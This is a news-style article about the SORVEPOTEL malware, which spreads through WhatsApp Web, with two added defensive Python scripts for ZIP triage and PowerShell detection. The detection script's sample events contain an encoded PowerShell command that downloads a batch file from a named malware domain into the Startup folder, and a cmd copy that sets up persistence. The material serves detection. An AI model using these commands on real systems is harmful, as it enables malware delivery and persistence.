Reza Rafati

Self-Spreading SORVEPOTEL Malware Exploits WhatsApp Web to Infect Windows Systems

WhatsApp Web sessions hijacked to deliver self-replicating ZIP malware across contact networks

A newly uncovered malware known as SORVEPOTEL is spreading automatically through WhatsApp Web, sending infected ZIP files to every contact of compromised users. Security researchers say the campaign has already struck hundreds of systems in Brazil and could mark a new phase in socially engineered self-replicating malware.

How the Campaign Began

The malware was discovered on October 3 by Trend Micro, which found that SORVEPOTEL spreads through desktop versions of WhatsApp rather than mobile apps.
Unlike classic spyware or ransomware, the code’s primary purpose is propagation — replicating itself across trusted chat networks instead of stealing information directly.

Researchers observed that once a single machine is infected, the malware automatically hijacks any active WhatsApp Web session and sends the same malicious ZIP file to every visible contact and group. Within minutes, hundreds of outbound messages can be generated, creating an exponential infection pattern reminiscent of early-2000s worms.

Infection Chain

The initial vector is a phishing message — delivered via WhatsApp or email — from an already compromised contact. The text urges the recipient to open a ZIP file with a legitimate-looking name such as “RES-20250930_112057.zip” or “ComprovanteSantander-75319981.zip.”
Inside the archive lies a hidden .LNK shortcut that executes a PowerShell command, launching a chain of scripts designed to download and install the SORVEPOTEL payload.

Trend Micro analysis shows that the commands use Base64 encoding and hidden-window execution to evade detection. The downloaded batch file then copies itself into the Windows Startup folder, guaranteeing persistence on reboot.

| Stage | Action | Technique |
|-------|--------|-----------|
| 1 | User opens malicious ZIP | Social engineering |
| 2 | .LNK runs encoded PowerShell | Script obfuscation |
| 3 | Payload fetched from remote domain | Command-and-control |
| 4 | Script adds itself to Startup | Persistence |
| 5 | WhatsApp Web sends new ZIPs | Automated propagation |
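The lure at stages 1 and 2 is an archive whose real payload is a shortcut. The following triage script is an added example, not code from the article or from Trend Micro: it inspects a ZIP and flags entries by `.lnk` extension, by the Shell Link file header (so a shortcut renamed to look like an image is still caught), by decoy double extensions, and by the MS-DOS hidden attribute the article mentions. The archive it inspects is constructed in memory, and the inner entry names are invented for the example; no real sample is used.

```python
"""Added triage example (not the article's or Trend Micro's code) for a ZIP
lure whose payload is a .LNK shortcut. The archive below is constructed."""
import io
import zipfile

# ShellLinkHeader: HeaderSize 0x4C followed by the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in on-disk (little-endian) form.
LNK_SIGNATURE = bytes.fromhex("4c000000" "01140200" "00000000" "c000000000000046")
EXECUTABLE_EXTENSIONS = {".lnk", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".hta", ".scr", ".exe"}
DECOY_EXTENSIONS = {"pdf", "jpg", "jpeg", "png", "doc", "docx", "xls", "xlsx"}
DOS_HIDDEN = 0x02  # the low byte of external_attr carries the MS-DOS attribute bits


def is_double_extension(lower_name):
    """True for names like 'recibo.pdf.lnk': a decoy document extension hiding an executable one."""
    parts = lower_name.rsplit(".", 2)
    return (len(parts) == 3
            and parts[1] in DECOY_EXTENSIONS
            and "." + parts[2] in EXECUTABLE_EXTENSIONS)


def triage_zip(zip_bytes):
    """Return [{"name", "reasons"}] for every entry that looks like a shortcut lure."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(len(LNK_SIGNATURE))  # only the header is needed
            lower = info.filename.lower()
            reasons = []
            if lower.endswith(".lnk"):
                reasons.append("lnk_extension")
            if head.startswith(LNK_SIGNATURE):
                reasons.append("lnk_header")       # catches renamed shortcuts
            if is_double_extension(lower):
                reasons.append("double_extension")
            if info.external_attr & DOS_HIDDEN:
                reasons.append("hidden_attribute")
            if reasons:
                findings.append({"name": info.filename, "reasons": reasons})
    return findings


def build_sample_zip():
    """Constructed lookalike of the lure archive: a hidden .LNK with a decoy
    double extension, a shortcut renamed as an image, and a harmless PDF."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        lnk = zipfile.ZipInfo("RES-20250930_112057.pdf.lnk")  # invented entry name
        lnk.external_attr = DOS_HIDDEN
        zf.writestr(lnk, LNK_SIGNATURE + b"\x00" * 56)          # header only, no real target
        zf.writestr("foto.jpg", LNK_SIGNATURE + b"\x00" * 56)   # shortcut posing as an image
        zf.writestr("recibo.pdf", b"%PDF-1.4\n%constructed decoy\n")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding["name"], "->", ", ".join(finding["reasons"]))
```

Checking the 20-byte header rather than only the extension is the part worth keeping: a mail or chat gateway that strips `.lnk` by name alone misses a shortcut that arrives as `foto.jpg`.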

Scale and Geographic Focus

According to telemetry cited by The Hacker News, 477 systems have been infected so far — 457 of them in Brazil.
The campaign primarily targets government offices, education networks, and small-to-medium enterprises where WhatsApp Web is commonly used for coordination.

Although still concentrated in Latin America, security analysts note early detections in Portugal, Spain, and Argentina. Because propagation depends on contact lists rather than regional infrastructure, researchers warn that one international chat connection could globalize the outbreak.

Infrastructure and Indicators

The malware’s infrastructure relies on small, fast-moving domains hosted through inexpensive overseas registrars. Known examples include:

  • sorvetenopoate[.]com
  • expahnsiveuser[.]com

These sites deliver plain-text PowerShell or batch scripts rather than compiled binaries, so the operators can re-tool quickly whenever a domain is blocked.
So far, investigators have not found evidence of large-scale credential theft or encryption activity — SORVEPOTEL’s behavior is almost entirely centered on spreading itself.
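The infection chain above (encoded, hidden-window PowerShell launched from the shortcut; a batch file written into the Startup folder) and the domains listed in this section can be turned into a simple host-side detection. The script below is an added example, not the article's or Trend Micro's code: it runs over process-creation events, decodes any `-EncodedCommand` blob the way PowerShell would (Base64 of UTF-16LE), and reports which stages of the chain an event matches. The event records are constructed for the example; the two domains come from the article, written out only so a host extracted from a command line can be compared against them.

```python
"""Added detection example (not the article's or Trend Micro's code) for the
SORVEPOTEL-style chain: encoded, hidden-window PowerShell, a write into the
Startup folder, and script fetches from the listed domains. Sample events are
constructed, not real telemetry."""
import base64
import re

# Domains named in the article (defanged there as [.]); refanged for matching only.
KNOWN_DOMAINS = {"sorvetenopoate.com", "expahnsiveuser.com"}

# -e, -ec, -enc, -EncodedCommand: PowerShell accepts any unambiguous prefix.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I)
URL_HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
STARTUP_RE = re.compile(r"\\start menu\\programs\\startup\\", re.I)
WRITE_RE = re.compile(r"\b(?:copy|copy-item|move|move-item|out-file|set-content)\b|-outfile", re.I)


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def severity_for(findings):
    if len(findings) >= 3:
        return "high"
    return "medium" if findings else "none"


def analyze_event(event):
    """event: {"image", "parent_image", "command_line"} from a process-creation log.
    Returns the sorted technique findings, the decoded script and a severity."""
    image = event.get("image", "").lower()
    cmd = event.get("command_line", "")
    decoded = decode_encoded_command(cmd)
    # Inspect both the raw command line and whatever the Base64 blob conceals.
    effective = cmd if decoded is None else cmd + "\n" + decoded
    findings = set()
    if image.endswith("powershell.exe") and decoded is not None:
        findings.add("encoded_powershell")       # stage 2: script obfuscation
    if HIDDEN_RE.search(effective):
        findings.add("hidden_window")            # stage 2: evasion
    for host in URL_HOST_RE.findall(effective):
        if host.lower() in KNOWN_DOMAINS:
            findings.add("known_c2_domain")      # stage 3: payload fetch
    if STARTUP_RE.search(effective) and WRITE_RE.search(effective):
        findings.add("startup_persistence")      # stage 4: persistence
    ordered = sorted(findings)
    return {"findings": ordered, "decoded": decoded, "severity": severity_for(ordered)}


def analyze_events(events):
    return [analyze_event(e) for e in events]


def encode_for_powershell(script):
    """Build an -EncodedCommand argument the way PowerShell expects (used only to construct samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed stage-2 script: fetch a batch file from a listed domain straight into Startup.
STAGE2_SCRIPT = ("Invoke-WebRequest -Uri 'http://sorvetenopoate.com/s.bat' "
                 "-OutFile \"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\update.bat\"")

SAMPLE_EVENTS = [
    {   # constructed: shortcut-launched PowerShell, encoded and hidden
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\explorer.exe",
        "command_line": "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(STAGE2_SCRIPT),
    },
    {   # constructed: batch file copying itself into the Startup folder
        "image": r"C:\Windows\System32\cmd.exe",
        "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "command_line": r'cmd.exe /c copy "%TEMP%\update.bat" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"',
    },
    {   # constructed: routine administrative PowerShell, should not fire
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "parent_image": r"C:\Windows\System32\cmd.exe",
        "command_line": "powershell.exe -NoProfile -Command Get-ChildItem C:\\Users",
    },
]

if __name__ == "__main__":
    for event, result in zip(SAMPLE_EVENTS, analyze_events(SAMPLE_EVENTS)):
        print(result["severity"], result["findings"], event["image"].rsplit("\\", 1)[-1])
```

Decoding the blob before matching is what makes the Startup-folder and domain checks work on the first event: the raw command line shows only `-W Hidden -Enc ...`, and every stage-3 and stage-4 indicator sits inside the Base64.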

Links to Previous Campaigns

The tactics echo those of earlier mobile-focused threats such as FluBot, PixPirate, and WhatsApp Pink, but SORVEPOTEL distinguishes itself by abusing Windows desktop integrations rather than Android apps.
Security teams at IBM X-Force noted that its scripting resembles older email-worm logic combined with modern social-network vectors.

Comparative Overview

| Malware | Platform | Propagation Method | Primary Motive |
|---------|----------|--------------------|----------------|
| FluBot | Android | SMS links | Banking credential theft |
| PixPirate | Android | WhatsApp messages | Financial fraud |
| SORVEPOTEL | Windows + WhatsApp Web | Automated contact messaging | Mass replication |

The pattern aligns with what researchers describe as “human-network exploitation” — attacks that weaponize trust relationships instead of software vulnerabilities.

Broader Implications

Analysts warn that SORVEPOTEL could signal a resurgence of worm-like malware inside modern communication ecosystems. By leveraging legitimate browser sessions, attackers bypass enterprise firewalls and deliver payloads directly into private or business group chats.

A study on message-forwarding dynamics found that WhatsApp chains can reach thousands of recipients within an hour, amplifying any malicious link or attachment through ordinary user behavior. (arxiv.org)

If adapted for data theft or credential harvesting, the same infrastructure could rapidly evolve into an espionage or ransomware vehicle, exploiting the human network as an unwitting distribution system.

Industry and Platform Response

Meta, which owns WhatsApp, confirmed that its automated systems are suspending accounts generating unusual message volumes, though it has not released official figures.
Trend Micro continues to publish indicators of compromise, and Brazilian authorities have opened a joint investigation with the national CERT.

Security bodies note parallels with the Collins Aerospace ransomware disruptions, where a single supplier’s failure cascaded into widespread operational impact. Both incidents highlight how interconnected digital ecosystems amplify exposure.

Statistics and Early Findings

Current telemetry estimates:

  • 477 total infections, 95 percent within Brazil.
  • At least six active command-and-control domains identified.
  • Average propagation rate exceeding 100 outbound ZIPs per host within the first hour.

If left unchecked, analysts say similar campaigns could spread faster than email worms once did, fueled by always-on connectivity and user trust in messaging platforms.

European and Global Context

The SORVEPOTEL incident surfaces amid growing concern over messaging-based espionage.
Only days earlier, European and Ukrainian authorities reported arrests tied to Chinese cyber-operations, while ESET confirmed collaboration between Russian groups Gamaredon and Turla targeting Ukrainian institutions.

Together, these cases reveal how both state and criminal actors exploit everyday communication tools for strategic or financial gain. Recent arrests in Ukraine demonstrate how chat platforms are increasingly implicated in broader geopolitical conflict.

Outlook

The emergence of SORVEPOTEL underscores the fragility of communication ecosystems when convenience tools bridge mobile and desktop environments.
By turning WhatsApp Web sessions into malware conduits, the attackers behind this campaign exposed a global weak point — where personal trust intersects with enterprise workflows.

While its reach remains regionally contained, experts agree that SORVEPOTEL’s architecture could easily be repurposed for espionage or monetized extortion, making it a template worth close watch across the cybersecurity community.